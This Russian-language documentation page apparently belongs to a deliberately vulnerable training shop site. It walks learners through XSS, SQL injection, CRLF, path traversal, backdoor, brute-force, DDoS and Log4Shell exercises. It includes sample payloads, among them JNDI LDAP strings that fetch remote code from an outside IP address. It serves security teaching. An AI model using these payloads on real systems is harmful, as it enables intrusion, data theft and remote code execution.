Обзор проекта Типы атак Базовые атаки XSS SQL Injection CSRF CRLF Path Traversal MITM Cookie Tampering Продвинутые атаки Brute Force Dead Link Bypass Backdoor DDoS Log4Shell Wayback Machine Terminal Access Как использовать Меры безопасности

Тестовый стенд кибербезопасности

Данный проект представляет собой тестовый стенд для обучения и практики навыков кибербезопасности. Стенд имитирует веб-приложение интернет-магазина "ЦифроМаркет" с намеренно внедренными уязвимостями для отработки различных типов атак.

Важно! Данный стенд предназначен исключительно для образовательных целей. Использование представленных техник на реальных веб-сайтах без разрешения владельцев является незаконным.

О проекте

Тестовый стенд имитирует веб-сервис с различными уязвимостями, которые позволяют изучить и отработать следующие типы атак:

Базовые атаки (для новичков):
  • XSS (Cross-Site Scripting)
  • SQL Injection
  • CSRF (Cross-Site Request Forgery)
  • CRLF (Carriage Return Line Feed) Injection
  • Path Traversal
  • MITM (Man-in-the-Middle) симуляция
  • Cookie Tampering / Bypass
Продвинутые атаки:
  • Brute Force атаки
  • Dead Link Bypass
  • Backdoor Access
  • DDoS (Distributed Denial of Service)
  • Log4Shell (CVE-2021-44228)
  • Wayback Machine эксплуатация
  • Terminal/Command Injection

Стенд разработан таким образом, что атаки образуют цепочки: успешная атака одного типа может предоставить информацию, необходимую для проведения следующей атаки. Это позволяет смоделировать реальные сценарии многоступенчатого взлома.

Типы атак

Тестовый стенд поддерживает различные типы атак, разделенные на категории по уровню сложности:

Базовые атаки

Эти атаки подходят для изучения основ кибербезопасности и не требуют глубоких технических знаний.

XSS (Cross-Site Scripting) Легко

XSS-атака позволяет внедрить вредоносный JavaScript-код, который будет выполнен в браузере жертвы.

Что можно сделать:

  • Украсть cookies пользователя
  • Перенаправить пользователя на фишинговый сайт
  • Выполнить действия от имени пользователя
  • Показать поддельные формы для кражи данных

Уязвимые компоненты на стенде:

  • Форма поиска товаров - в shop.php
  • Форма комментариев - на страницах товаров
  • Профиль пользователя - в настройках имени
  • Форма контактов - в contact.php

Простой пример для начинающих:

В поле поиска введите: <script>alert('XSS работает!')</script>

SQL Injection Легко

SQL-инъекция позволяет манипулировать запросами к базе данных, получая доступ к данным, которые должны быть защищены.

Что можно сделать:

  • Войти в систему без знания пароля
  • Получить список всех пользователей
  • Узнать структуру базы данных
  • Извлечь пароли администраторов

Уязвимые компоненты на стенде:

  • Форма входа - login.php (поля username и password)
  • Поиск товаров - search.php
  • Фильтр категорий - shop.php

Простой пример для начинающих:

В поле "Логин" введите: admin' -- В поле "Пароль": любой текст

CSRF (Cross-Site Request Forgery) Средне

CSRF-атака заставляет аутентифицированного пользователя выполнить нежелательное действие от своего имени.

Что можно сделать:

  • Изменить пароль пользователя
  • Добавить товары в корзину
  • Изменить настройки профиля
  • Выполнить покупки от имени пользователя

Уязвимые компоненты на стенде:

  • Изменение пароля - в профиле пользователя
  • Добавление в корзину - на страницах товаров
  • Редактирование профиля - profile.php

CRLF Injection Средне

CRLF-инъекция позволяет манипулировать заголовками HTTP-ответа, внедряя символы возврата каретки (CR) и перевода строки (LF).

Что можно сделать:

  • Установить собственные cookies
  • Перенаправить пользователя на другой сайт
  • Внедрить XSS через заголовки
  • Разделить HTTP-ответ на части

Уязвимые компоненты на стенде:

  • Поиск категорий - в contact.php
  • Редирект после входа - login.php

Простой пример:

В поиске введите: test%0D%0ASet-Cookie: hacked=1

Path Traversal Средне

Path Traversal атака позволяет получить доступ к файлам, которые находятся за пределами корневой директории веб-сервера.

Что можно сделать:

  • Прочитать конфигурационные файлы
  • Получить пароли из файлов
  • Узнать структуру сервера
  • Найти backup файлы

Уязвимые компоненты на стенде:

  • Просмотр файлов - в contact.php (демо-форма)
  • Загрузка изображений - в админ-панели

Простой пример:

В поле файла введите: ../../../etc/passwd

MITM (Man-in-the-Middle) Средне

Стенд предоставляет симуляцию атаки "человек посередине", которая демонстрирует перехват и модификацию данных.

Что можно сделать:

  • Перехватить логины и пароли
  • Изменить данные платежей
  • Заменить загружаемые файлы
  • Украсть сессионные токены

Уязвимые компоненты на стенде:

  • Незащищенная передача данных - формы без HTTPS
  • Отсутствие проверки сертификатов

Продвинутые атаки

Эти атаки требуют более глубоких знаний в области кибербезопасности и предназначены для опытных пользователей.

Brute Force атаки Средне

Brute Force - это метод подбора паролей путем проверки всех возможных комбинаций.

Что можно сделать:

  • Подобрать пароли к учетным записям
  • Найти слабые пароли пользователей
  • Автоматизировать процесс взлома
  • Обойти слабую защиту от брутфорса

Особенности на стенде:

  • Защита отключена - для демонстрации атак
  • API для брутфорса - в login.php
  • Веб-терминал - terminal.php с инструментами
  • Готовые скрипты - автоматические атаки

Как попробовать:

  1. Откройте терминал (terminal.php)
  2. Используйте команду: python -login admin -attack password -slowar slowar.txt ktk_brute.py
  3. Или откройте консоль браузера и скопируйте готовый код с login.php

Backdoor Access Сложно

Backdoor - это скрытые способы доступа к системе, оставленные разработчиками для отладки.

Что можно сделать:

  • Получить список всех пользователей
  • Узнать конфигурацию системы
  • Получить доступ к PHP информации
  • Обойти все системы авторизации

Скрытые backdoor на стенде:

  • ?debug=show_users - показать всех пользователей
  • ?debug=show_config - показать конфигурацию
  • ?debug=phpinfo - показать информацию PHP

Как найти:

  1. Откройте terminal.php
  2. Используйте команду: nmap --backdoor ktk-web.ru
  3. Или попробуйте URL: shop.php?debug=show_users

DDoS (Distributed Denial of Service) Сложно

DDoS атака перегружает сервер большим количеством запросов, делая сайт недоступным.

Что происходит:

  • Сайт становится недоступным (ошибка 503)
  • Страницы перестают загружаться
  • Сервер не может обработать запросы
  • Пользователи не могут зайти на сайт

Как запустить на стенде:

  1. Откройте terminal.php
  2. Введите команду: attack start
  3. Для мощной атаки: attack boost
  4. Попробуйте зайти на contact.php - он должен быть недоступен
  5. Остановить: attack stop
Заметка: Это симуляция настоящей DDoS атаки. В реальности такие атаки используют тысячи компьютеров.

Log4Shell (CVE-2021-44228) Сложно

Log4Shell - это критическая уязвимость в библиотеке логирования Log4j, которая позволяет выполнять произвольный код.

Что можно сделать:

  • Выполнить программы на сервере (calc.exe, cmd.exe)
  • Получить полный контроль над сервером
  • Загрузить вредоносное ПО
  • Украсть все данные с сервера

Уязвимые места на стенде:

  • Форма контактов - contact.php (поля имени, темы, сообщения)
  • User-Agent заголовок - автоматически проверяется

Магические payload'ы:

${jndi:ldap://151.236.218.228:1389/Log4Calc} - запускает калькулятор ${jndi:ldap://151.236.218.228:1389/Log4cmd} - открывает командную строку ${jndi:ldap://151.236.218.228:1389/Log4explorer} - открывает проводник

Как попробовать:

  1. Откройте contact.php
  2. В поле "Имя" вставьте: ${jndi:ldap://151.236.218.228:1389/Log4Calc}
  3. Заполните остальные поля и отправьте
  4. Должен запуститься калькулятор Windows!

Wayback Machine эксплуатация Средне

Использование архивных снимков сайтов для поиска старых уязвимостей и забытых файлов.

Что можно найти:

  • Старые админ-панели
  • Забытые backup файлы
  • Удаленные конфигурации
  • Старые API ключи

Как использовать:

  1. Откройте wayback.php
  2. Введите "ktk-web.ru" для поиска
  3. Изучите календарь архивных снимков
  4. Обратите внимание на красные месяцы (с Dead Links)
  5. Кликните на снимки с предупреждениями

Terminal Access / Command Injection Сложно

Веб-терминал предоставляет доступ к хакерским инструментам и симуляции команд Linux.

Доступные инструменты:

  • Сканеры CVE - для поиска уязвимостей
  • Брутфорс инструменты - для подбора паролей
  • Nmap сканер - для поиска backdoor'ов
  • DDoS инструменты - для атак на отказ

Основные команды:

help - показать все доступные команды ls - показать файлы в директории cat README.md - прочитать документацию python cve-2021-44228.py - запустить CVE эксплойт nmap --backdoor ktk-web.ru - найти backdoor'ы attack start - начать DDoS атаку

Как получить доступ:

  1. Откройте terminal.php прямо по ссылке
  2. Или найдите ссылку "Terminal" на других страницах
  3. Введите help для списка команд

Как использовать стенд

Тестовый стенд разработан для пошагового прохождения различных сценариев атак. Каждый сценарий представляет собой последовательность действий, которые необходимо выполнить для достижения цели.

Общий алгоритм работы со стендом:

  1. Выберите интересующий тип атаки в разделе Сценарии атак
  2. Ознакомьтесь с описанием уязвимости и целью атаки
  3. Следуйте инструкциям, выполняя последовательность действий
  4. Для каждого шага сценария проверяйте результат и получайте информацию для следующего шага
  5. После успешного прохождения всех шагов, вы получите подтверждение успешности атаки

Рекомендуемая последовательность изучения:

Для новичков:
  1. XSS (поиск товаров)
  2. SQL Injection (форма входа)
  3. Cookie Tampering
  4. Path Traversal
Средний уровень:
  1. CSRF атаки
  2. CRLF Injection
  3. Brute Force
  4. Wayback Machine
Продвинутый уровень:
  1. Dead Link Bypass
  2. Backdoor Access
  3. Log4Shell
  4. DDoS + Terminal
Совет: Начните с более простых атак и постепенно переходите к более сложным сценариям. Многие атаки можно комбинировать для создания цепочек взлома.

Меры безопасности

Тестовый стенд содержит намеренно внедренные уязвимости и должен использоваться только в образовательных целях. Для безопасного использования рекомендуется:

  • Запускать стенд в изолированной среде (локальный компьютер, виртуальная машина)
  • Не использовать реальные учетные данные или конфиденциальную информацию
  • Убедиться, что стенд не доступен из внешней сети
  • После завершения обучения удалить или отключить стенд
  • Никогда не тестировать изученные техники на реальных сайтах без разрешения

Легальные способы практики:

  • Данный стенд и другие образовательные платформы
  • Bug Bounty программы (с разрешением компаний)
  • Собственные веб-приложения
  • Специализированные тренировочные платформы
Предупреждение! Использование техник, представленных на стенде, для атаки на реальные веб-сайты без разрешения владельцев является незаконным и может привести к уголовной ответственности.